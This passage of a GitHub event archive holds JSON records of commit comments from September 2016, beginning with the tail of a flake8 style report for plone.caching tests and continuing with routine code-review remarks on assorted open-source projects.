assertEqual\nplone/caching/tests/test_hooks.py:539:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:539:80: E501 line too long (81 > 79 characters)\nplone/caching/tests/test_hooks.py:566:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:575:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:576:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:605:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:614:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:615:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:644:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:653:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:654:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:683:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:692:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:693:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:722:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:731:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:732:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:734:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_hooks.py:752:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:753:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:762:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:763:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:774:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:775:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:791:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:792:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:810:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:811:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:828:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:829:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:829:80: E501 line too long (81 > 79 characters)\nplone/caching/tests/test_hooks.py:857:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:863:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:864:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:894:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:902:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:903:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:904:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:905:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:909:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:910:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:910:80: E501 line too long (82 > 79 characters)\nplone/caching/tests/test_hooks.py:911:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:943:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:951:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:952:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:953:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:954:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:958:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:959:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:959:80: E501 line too long (83 > 79 characters)\nplone/caching/tests/test_hooks.py:960:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:991:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:999:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:1000:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:1001:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:1002:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:1006:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:1007:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:1007:80: E501 line too long (82 > 79 characters)\nplone/caching/tests/test_hooks.py:1008:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:1038:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:1043:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:1044:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:1083:38: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:1099:9: B901 blind except: statement\nplone/caching/tests/test_hooks.py:1100:23: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:1107:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:1109:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_lookup.py:12:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_lookup.py:17:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_lookup.py:22:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_lookup.py:29:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_lookup.py:35:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_lookup.py:37:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_operations.py:20:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_operations.py:23:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_operations.py:31:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_operations.py:53:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:54:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:55:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:59:31: Q000 Remove bad quotes.\nplone/caching/tests/test_operations.py:59:32: S001 found %s formatter\nplone/caching/tests/test_operations.py:59:80: E501 line too long (84 > 79 characters)\nplone/caching/tests/test_operations.py:68:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:69:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:70:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:74:31: Q000 Remove bad quotes.\nplone/caching/tests/test_operations.py:74:32: S001 found %s formatter\nplone/caching/tests/test_operations.py:74:80: E501 line too long (88 > 79 characters)\nplone/caching/tests/test_operations.py:83:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:84:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:85:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:89:31: Q000 Remove bad quotes.\nplone/caching/tests/test_operations.py:89:32: S001 found %s formatter\nplone/caching/tests/test_operations.py:89:80: E501 line too long (93 > 79 characters)\nplone/caching/tests/test_operations.py:97:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:98:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:101:31: Q000 Remove bad quotes.\nplone/caching/tests/test_operations.py:101:32: S001 found %s formatter\nplone/caching/tests/test_operations.py:101:80: E501 line too long (100 > 79 characters)\nplone/caching/tests/test_operations.py:120:45: Q000 Remove bad quotes.\nplone/caching/tests/test_operations.py:125:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:126:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:127:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:127:80: E501 line too long (86 > 79 characters)\nplone/caching/tests/test_operations.py:133:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:134:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:135:80: E501 line too long (86 > 79 characters)\nplone/caching/tests/test_operations.py:138:31: Q000 Remove bad quotes.\nplone/caching/tests/test_operations.py:138:32: S001 found %s formatter\nplone/caching/tests/test_operations.py:138:80: E501 line too long (100 > 79 characters)\nplone/caching/tests/test_operations.py:157:46: Q000 Remove bad quotes.\nplone/caching/tests/test_operations.py:173:46: Q000 Remove bad quotes.\nplone/caching/tests/test_operations.py:178:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:179:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:180:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:180:80: E501 line too long (86 > 79 characters)\nplone/caching/tests/test_operations.py:186:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:187:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:189:80: E501 line too long (91 > 79 characters)\nplone/caching/tests/test_operations.py:191:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_utils.py:20:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_utils.py:26:80: E501 line too long (89 > 79 characters)\nplone/caching/tests/test_utils.py:27:14: D001 found failUnless( replace it with assertTrue\nplone/caching/tests/test_utils.py:32:80: E501 line too long (89 > 79 characters)\nplone/caching/tests/test_utils.py:33:14: D001 found failUnless( replace it with assertTrue\nplone/caching/tests/test_utils.py:39:53: E221 multiple spaces before operator\nplone/caching/tests/test_utils.py:39:80: E501 line too long (92 > 79 characters)\nplone/caching/tests/test_utils.py:41:80: E501 line too long (89 > 79 characters)\nplone/caching/tests/test_utils.py:42:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_utils.py:48:80: E501 line too long (95 > 79 characters)\nplone/caching/tests/test_utils.py:49:62: E221 multiple spaces before operator\nplone/caching/tests/test_utils.py:49:80: E501 line too long (115 > 79 characters)\nplone/caching/tests/test_utils.py:51:80: E501 line too long (89 > 79 characters)\nplone/caching/tests/test_utils.py:52:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_utils.py:54:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_utils.py:70:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_utils.py:84:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_utils.py:90:80: E501 line too long (88 > 79 characters)\nplone/caching/tests/test_utils.py:101:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_utils.py:107:80: E501 line too long (88 > 79 characters)\nplone/caching/tests/test_utils.py:108:80: E501 line too long (88 > 79 characters)\nplone/caching/tests/test_utils.py:109:80: E501 line too long (97 > 79 characters)\nplone/caching/tests/test_utils.py:120:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_utils.py:126:80: E501 line too long (88 > 79 characters)\nplone/caching/tests/test_utils.py:138:80: E501 line too long (83 > 79 characters)\nplone/caching/tests/test_utils.py:139:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_utils.py:141:1: E302 expected 2 blank lines, found 1\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-01T09:29:36Z"}
{"id":"4501472590","type":"CommitCommentEvent","actor":{"login":"AlexeiSyrtsov"},"repo":{"name":"AlexeiSyrtsov/helloworld"},"payload":{"comment":{"id":18860827,"position":null,"line":null,"path":null,"commit_id":"3e50c25567235d9972350e2ead7396363ef469f3","created_at":"2016-09-01T09:31:06Z","updated_at":"2016-09-01T09:31:06Z","body":"You should add some more dashes )))"}},"created_at":"2016-09-01T09:31:06Z"}
{"id":"4501478526","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"v0dro/daru"},"payload":{"comment":{"id":18860836,"position":11,"line":73,"path":"lib/daru.rb","commit_id":"f9e89ffe54e28b228502df3f2ba78af629e3d1fb","created_at":"2016-09-01T09:32:18Z","updated_at":"2016-09-01T09:32:18Z","body":"For me, the best way would be requiring them contextually. So, when you try to build some report, reportbuilder is required (and error is thrown if it is absent -- which is absolutely reasonable thing, as you can't build report without reportbuilder). This way we don't need any complex custom functionality, just use natural Ruby's behavior."}},"created_at":"2016-09-01T09:32:18Z"}
{"id":"4501479007","type":"CommitCommentEvent","actor":{"login":"McSwaggens"},"repo":{"name":"MrWhiteGoat/linux-csgo-external"},"payload":{"comment":{"id":18860837,"position":null,"line":null,"path":null,"commit_id":"583b6741c5271c87381a4323a1f83633580f92da","created_at":"2016-09-01T09:32:23Z","updated_at":"2016-09-01T09:32:23Z","body":"Make a pull request and I'll accept it.\r\ngood work."}},"created_at":"2016-09-01T09:32:23Z"}
{"id":"4501481647","type":"CommitCommentEvent","actor":{"login":"hughicy"},"repo":{"name":"hughicy/android_device_xiaomi_gemini"},"payload":{"comment":{"id":18860847,"position":null,"line":null,"path":null,"commit_id":"85a03584f19756044c5ef7d2e1b5a88a50ff1e72","created_at":"2016-09-01T09:32:55Z","updated_at":"2016-09-01T09:32:55Z","body":"Yes, I'd like to do that, but after i pull it here, the author changes......\r\nso could u tell me how to change it back? thx!!"}},"created_at":"2016-09-01T09:32:55Z"}
{"id":"4501482773","type":"CommitCommentEvent","actor":{"login":"DaniilZhavner"},"repo":{"name":"PurrWeb/upwork-user-agreement"},"payload":{"comment":{"id":18860848,"position":null,"line":null,"path":null,"commit_id":"33bb4f6b3723a6b9f51b52e7519ff6884c385a4e","created_at":"2016-09-01T09:33:10Z","updated_at":"2016-09-01T09:33:10Z","body":"done"}},"created_at":"2016-09-01T09:33:10Z"}
{"id":"4501483377","type":"CommitCommentEvent","actor":{"login":"Thrax989"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":18860850,"position":null,"line":null,"path":null,"commit_id":"503b4cec52e580e7f8621d008d1022d0d4b023fa","created_at":"2016-09-01T09:33:18Z","updated_at":"2016-09-01T09:33:18Z","body":"http://www.mediafire.com/download/74lkar0dek8yt72/Pub7-master.zip"}},"created_at":"2016-09-01T09:33:18Z"}
{"id":"4501483799","type":"CommitCommentEvent","actor":{"login":"SCdF"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18860851,"position":14,"line":30,"path":"static/js/controllers/contacts-content.js","commit_id":"f94c4302cf6e31995aed9c050c979f6ef169d525","created_at":"2016-09-01T09:33:24Z","updated_at":"2016-09-01T09:33:24Z","body":"right yeah so there should be a return here."}},"created_at":"2016-09-01T09:33:24Z"}
{"id":"4501503129","type":"CommitCommentEvent","actor":{"login":"skaldarnar"},"repo":{"name":"Terasology/StructureTemplates"},"payload":{"comment":{"id":18860890,"position":82,"line":156,"path":"src/main/java/org/terasology/structureTemplates/internal/systems/StructureSpawnServerSystem.java","commit_id":"7cf90d7ba99b335b85d41eb91ec42da04384263a","created_at":"2016-09-01T09:37:22Z","updated_at":"2016-09-01T09:37:22Z","body":"> Isn't the code below setting the stuff redundantly(e.g. first layer 0, then layer 0+1 then layer 0+1+2 etc.)? Couldn't we simplify it to always set a single layer?\r\n\r\nThe buildings grows out of the ground, ie., the tip is visible first and then it moves upwards. That's way all the previous layers have be placed again, shifted one block up. I'll put some thoughts into arbitrary build steps. Maybe *growing* on the one hand, and *piling/stacking* on the other hand? Not sure about good terminology. In any case, javadoc will help!\r\n\r\n> Also when you add this delayed building you might want to cosider what happesn when a chunk with a unfinished building gets partly unloaded. The playing entity might still be loaded, while it can't set some part of the structure because the chunk is unloaded.\r\n\r\nWhat would your suggestion on this be? Force the chunk to stay loaded until the building is finished? Pause the growing process until all relevant chunks are loaded again? Continue with loaded chunks and and store the end result (the original SpawnBlockRegions) to apply later on?"}},"created_at":"2016-09-01T09:37:22Z"}
{"id":"4501504824","type":"CommitCommentEvent","actor":{"login":"leiradel"},"repo":{"name":"libretro/RetroArch"},"payload":{"comment":{"id":18860894,"position":null,"line":null,"path":null,"commit_id":"8ffdc6663b620c386d6b277d7e70359dcdb2b254","created_at":"2016-09-01T09:37:44Z","updated_at":"2016-09-01T09:37:44Z","body":"Just out of curiosity, why `snprintf` if the code guarantees that there's enough space left in `str`?"}},"created_at":"2016-09-01T09:37:44Z"}
{"id":"4501505032","type":"CommitCommentEvent","actor":{"login":"peta15"},"repo":{"name":"hanoiiot/hanoi"},"payload":{"comment":{"id":18860896,"position":67,"line":99,"path":"app/pages/devices/add_edit_device.ts","commit_id":"6228390c5d5485731cccef8cd32e1258704df764","created_at":"2016-09-01T09:37:47Z","updated_at":"2016-09-01T09:37:47Z","body":"cool i like this to get this out of the door.  i'm assuming we will componentize the hue specific logic and view down the road to make way for other devices too."}},"created_at":"2016-09-01T09:37:47Z"}
{"id":"4501510451","type":"CommitCommentEvent","actor":{"login":"liskin"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18860902,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T09:38:54Z","updated_at":"2016-09-01T09:38:54Z","body":"You forgot to add this to the documentation. Also, this used to not be necessary. Do you happen to know since when is this necessary? Because now it's also necessary to add it here: https://github.com/xmonad/xmonad/blob/ec1a20c727b07dfc3b0eb11dd9aed00c7909f142/man/xmonad.hs#L78 otherwise when I reset the layout, all docks are ignored.\r\n\r\nAnd it gets worse. I used to have multiple instances of AvoidStruts since I didn't want all layouts to avoid struts. But then just the first instance worked. Maybe I could run docksStartupHook whenever I switched a layout, but that's just plain silly, isn't it?\r\n\r\nShall I open a new issue?"}},"created_at":"2016-09-01T09:38:54Z"}
{"id":"4501511473","type":"CommitCommentEvent","actor":{"login":"wkh237"},"repo":{"name":"wkh237/react-native-fetch-blob"},"payload":{"comment":{"id":18860906,"position":13,"line":115,"path":"src/ios/RNFetchBlobReqBuilder.m","commit_id":"467788b8c47277b3e378a2c077c7404e2a1a8dc9","created_at":"2016-09-01T09:39:09Z","updated_at":"2016-09-01T09:39:09Z","body":"The Android part uses fixed length request by default, this will be more consistent. Or we can make them both use chunked encoding by default ?"}},"created_at":"2016-09-01T09:39:09Z"}
{"id":"4501511535","type":"CommitCommentEvent","actor":{"login":"LamGB"},"repo":{"name":"alibaba/AndFix"},"payload":{"comment":{"id":18860907,"position":null,"line":null,"path":null,"commit_id":"e77af01bcda893ba4f83f0a935e72f19f92f13e6","created_at":"2016-09-01T09:39:09Z","updated_at":"2016-09-01T09:39:09Z","body":"还以为不更新了，蜜汁感动"}},"created_at":"2016-09-01T09:39:09Z"}
{"id":"4501513494","type":"CommitCommentEvent","actor":{"login":"peta15"},"repo":{"name":"hanoiiot/hanoi"},"payload":{"comment":{"id":18860910,"position":14,"line":17,"path":"app/pages/devices/control_device.html","commit_id":"6228390c5d5485731cccef8cd32e1258704df764","created_at":"2016-09-01T09:39:34Z","updated_at":"2016-09-01T09:39:34Z","body":"haha"}},"created_at":"2016-09-01T09:39:34Z"}
{"id":"4501513793","type":"CommitCommentEvent","actor":{"login":"fouxarn"},"repo":{"name":"PontusPersson/esh"},"payload":{"comment":{"id":18860911,"position":null,"line":null,"path":null,"commit_id":"b5d60c39f302d91ecfb597d5ae2efa90eb20e9ab","created_at":"2016-09-01T09:39:38Z","updated_at":"2016-09-01T09:39:38Z","body":"Best commit ever"}},"created_at":"2016-09-01T09:39:38Z"}
{"id":"4501515840","type":"CommitCommentEvent","actor":{"login":"HiroKws"},"repo":{"name":"laravel-ja/comja5"},"payload":{"comment":{"id":18860913,"position":null,"line":null,"path":null,"commit_id":"fc97f058d027bcc6b76edd185e1df9de2dd1acf4","created_at":"2016-09-01T09:40:07Z","updated_at":"2016-09-01T09:40:07Z","body":"報告ありがとうございます。修正いたしました。\r\n\r\nGithubには不具合や新規機能の追加などを相談するため、issueという機能があります。通常は、issueを新しく作成してもらえると、他の人にもわかりやすく、便利です。\r\n\r\n"}},"created_at":"2016-09-01T09:40:07Z"}
{"id":"4501521005","type":"CommitCommentEvent","actor":{"login":"Aericio"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":18860922,"position":null,"line":null,"path":null,"commit_id":"0a08eee5711256319f9b72a4245f92b2f51af590","created_at":"2016-09-01T09:41:08Z","updated_at":"2016-09-01T09:41:08Z","body":"I don't see it changing anything :?"}},"created_at":"2016-09-01T09:41:08Z"}
{"id":"4501521013","type":"CommitCommentEvent","actor":{"login":"bgcngm"},"repo":{"name":"hughicy/android_device_xiaomi_gemini"},"payload":{"comment":{"id":18860923,"position":null,"line":null,"path":null,"commit_id":"85a03584f19756044c5ef7d2e1b5a88a50ff1e72","created_at":"2016-09-01T09:41:08Z","updated_at":"2016-09-01T09:41:08Z","body":"I don't know how you did that, but for merging pull requests you have two options when doing it directly on GitHub:\r\n\r\n![image](https://cloud.githubusercontent.com/assets/1696148/18162908/4958b85e-7030-11e6-9dbf-c97c0471562d.png)\r\n\r\nThe only way now is to revert it using git shell and force push."}},"created_at":"2016-09-01T09:41:08Z"}
{"id":"4501522760","type":"CommitCommentEvent","actor":{"login":"chrismytton"},"repo":{"name":"everypolitician/everypolitician-python"},"payload":{"comment":{"id":18860929,"position":null,"line":null,"path":null,"commit_id":"96482458632d39e20471ad7fc64fd82446e3249c","created_at":"2016-09-01T09:41:29Z","updated_at":"2016-09-01T09:41:29Z","body":"🎉 "}},"created_at":"2016-09-01T09:41:29Z"}
{"id":"4501524918","type":"CommitCommentEvent","actor":{"login":"HiroKws"},"repo":{"name":"laravel-ja/comja5"},"payload":{"comment":{"id":18860939,"position":null,"line":null,"path":null,"commit_id":"fc97f058d027bcc6b76edd185e1df9de2dd1acf4","created_at":"2016-09-01T09:41:57Z","updated_at":"2016-09-01T09:41:57Z","body":"修正しましたが、packagistが反映するまで少々かかります。これは時間がさほどかかりません。もし、packagist.jpを使用されている場合、フェッチまで少々かかるかもしれません。\r\n\r\n一番反映が遅れる原因は、composerのキャッシュです。compser clearcacheを実行すると、キャッシュがクリアされるため、即時に反映されやすくなります。"}},"created_at":"2016-09-01T09:41:57Z"}
{"id":"4501527461","type":"CommitCommentEvent","actor":{"login":"acotiuga"},"repo":{"name":"xwiki-contrib/macro-fullcalendar"},"payload":{"comment":{"id":18860947,"position":20,"line":79,"path":"src/main/resources/Calendar/UpdateService.xml","commit_id":"a77f93f5bac63ee36bfa884f67fc454c30dd3971","created_at":"2016-09-01T09:42:28Z","updated_at":"2016-09-01T09:42:28Z","body":"Right, changing it. Thanks!"}},"created_at":"2016-09-01T09:42:28Z"}
{"id":"4501527765","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"ishantvivek/android"},"payload":{"comment":{"id":18860948,"position":null,"line":null,"path":null,"commit_id":"135732073b58abbe7ebdd5e7d3f367bb54039216","created_at":"2016-09-01T09:42:32Z","updated_at":"2016-09-01T09:42:32Z","body":"This patch features an backlight fix:\r\nhttps://github.com/ghsr/build_tools/blob/n-preview/patches/frameworks_base.patch"}},"created_at":"2016-09-01T09:42:32Z"}
{"id":"4501531733","type":"CommitCommentEvent","actor":{"login":"andypost"},"repo":{"name":"skilld-labs/aports"},"payload":{"comment":{"id":18860954,"position":4,"line":0,"path":"testing/openldap/APKBUILD","commit_id":"229722443cdecf4805c811493364d682350b3207","created_at":"2016-09-01T09:43:23Z","updated_at":"2016-09-01T09:43:23Z","body":"Suppose numbering should start from 0"}},"created_at":"2016-09-01T09:43:23Z"}
{"id":"4501531901","type":"CommitCommentEvent","actor":{"login":"peta15"},"repo":{"name":"hanoiiot/hanoi"},"payload":{"comment":{"id":18860955,"position":4,"line":37,"path":"app/services/device.ts","commit_id":"6228390c5d5485731cccef8cd32e1258704df764","created_at":"2016-09-01T09:43:25Z","updated_at":"2016-09-01T09:43:25Z","body":"cool"}},"created_at":"2016-09-01T09:43:25Z"}
{"id":"4501532446","type":"CommitCommentEvent","actor":{"login":"lekma"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18860958,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-01T09:43:33Z","updated_at":"2016-09-01T09:43:33Z","body":"@CvH: I'll try to be on #libreelec@freenode this afternoon, you can ping me there"}},"created_at":"2016-09-01T09:43:33Z"}
{"id":"4501534275","type":"CommitCommentEvent","actor":{"login":"marshafan"},"repo":{"name":"ychaikin/fullstack-course4"},"payload":{"comment":{"id":18860963,"position":1,"line":1,"path":"examples/Lecture15/pseudo-selectors-after.html","commit_id":"100708fdfaca521afcff2cbea354c46eab88dd54","created_at":"2016-09-01T09:43:56Z","updated_at":"2016-09-01T09:43:56Z","body":"ddd"}},"created_at":"2016-09-01T09:43:56Z"}
{"id":"4501535009","type":"CommitCommentEvent","actor":{"login":"lydell"},"repo":{"name":"jashkenas/coffeescript"},"payload":{"comment":{"id":18860967,"position":27,"line":272,"path":"test/modules.coffee","commit_id":"2d60c310aa0a15db69a09b3d99adf4308fbb58cd","created_at":"2016-09-01T09:44:05Z","updated_at":"2016-09-01T09:44:05Z","body":"I think I figured out the needed grammar :)\r\n\r\n```coffee\r\n  ImportClause: [\r\n    o '{ }',                                    -> new ModuleList [], yes\r\n    o 'ModuleList',                    -> new ModuleList $1, no\r\n    o 'ModuleList , { ModuleList OptComma }',   -> new ModuleList $1, no, $4, yes\r\n    o '{ ModuleList OptComma }',                -> new ModuleList $2, yes\r\n  ]\r\n```"}},"created_at":"2016-09-01T09:44:05Z"}
{"id":"4501536586","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"ishantvivek/android"},"payload":{"comment":{"id":18860972,"position":null,"line":null,"path":null,"commit_id":"135732073b58abbe7ebdd5e7d3f367bb54039216","created_at":"2016-09-01T09:44:25Z","updated_at":"2016-09-01T09:44:25Z","body":"I am porting basic stuffs now, WiFi, ril ,bt . These things would be patched after having such things working."}},"created_at":"2016-09-01T09:44:25Z"}
{"id":"4501536941","type":"CommitCommentEvent","actor":{"login":"peta15"},"repo":{"name":"hanoiiot/hanoi"},"payload":{"comment":{"id":18860973,"position":null,"line":null,"path":null,"commit_id":"6228390c5d5485731cccef8cd32e1258704df764","created_at":"2016-09-01T09:44:29Z","updated_at":"2016-09-01T09:44:29Z","body":"very impressive!  you have outdone yourself sir."}},"created_at":"2016-09-01T09:44:29Z"}
{"id":"4501543593","type":"CommitCommentEvent","actor":{"login":"mehlbox"},"repo":{"name":"mehlbox/cmmm"},"payload":{"comment":{"id":18860988,"position":null,"line":null,"path":null,"commit_id":"9665fa2ef6a0895bbd916f6b10169d74b4c2061e","created_at":"2016-09-01T09:45:54Z","updated_at":"2016-09-01T09:45:54Z","body":"add external links"}},"created_at":"2016-09-01T09:45:54Z"}
{"id":"4501545529","type":"CommitCommentEvent","actor":{"login":"lydell"},"repo":{"name":"jashkenas/coffeescript"},"payload":{"comment":{"id":18860995,"position":27,"line":272,"path":"test/modules.coffee","commit_id":"2d60c310aa0a15db69a09b3d99adf4308fbb58cd","created_at":"2016-09-01T09:46:18Z","updated_at":"2016-09-01T09:46:18Z","body":"Here are a bunch of valid tests:\r\n\r\n```\r\nimport { a } from 'b'\r\nimport { a, } from 'b'\r\nimport { a, b } from 'b'\r\nimport { a, b, } from 'b'\r\nimport {\r\n  a\r\n} from 'b'\r\nimport {\r\n  a,\r\n} from 'b'\r\nimport {\r\n  a,\r\n  b\r\n} from 'b'\r\nimport {\r\n  a,\r\n  b,\r\n} from 'b'\r\nimport {\r\n  a\r\n  b\r\n} from 'b'\r\nimport {\r\n  a,\r\n  b\r\n} from 'b'\r\n```\r\n\r\nAnd this one should be disallowed:\r\n\r\n```\r\nimport a, from 'b'\r\n```\r\n"}},"created_at":"2016-09-01T09:46:18Z"}
{"id":"4501546160","type":"CommitCommentEvent","actor":{"login":"franciscoruiz"},"repo":{"name":"2degrees/twapi-connection"},"payload":{"comment":{"id":18860997,"position":13,"line":185,"path":"twapi_connection/__init__.py","commit_id":"65e9020f05171ec12276160df820382fd087992e","created_at":"2016-09-01T09:46:26Z","updated_at":"2016-09-01T09:46:26Z","body":"If it were a potentially growing list, then definitely yes, but I strongly doubt we're going to add any other one."}},"created_at":"2016-09-01T09:46:26Z"}
{"id":"4501547809","type":"CommitCommentEvent","actor":{"login":"franciscoruiz"},"repo":{"name":"2degrees/twapi-connection"},"payload":{"comment":{"id":18861001,"position":13,"line":185,"path":"twapi_connection/__init__.py","commit_id":"65e9020f05171ec12276160df820382fd087992e","created_at":"2016-09-01T09:46:49Z","updated_at":"2016-09-01T09:46:49Z","body":"I've added tests, BTW (awkward...)"}},"created_at":"2016-09-01T09:46:49Z"}
{"id":"4501550445","type":"CommitCommentEvent","actor":{"login":"hughicy"},"repo":{"name":"hughicy/android_device_xiaomi_gemini"},"payload":{"comment":{"id":18861008,"position":null,"line":null,"path":null,"commit_id":"85a03584f19756044c5ef7d2e1b5a88a50ff1e72","created_at":"2016-09-01T09:47:22Z","updated_at":"2016-09-01T09:47:22Z","body":"I deleted the former one and fork it again, now it's OK. Next time I will\ntake notice of that, sorry for that....\n"}},"created_at":"2016-09-01T09:47:22Z"}
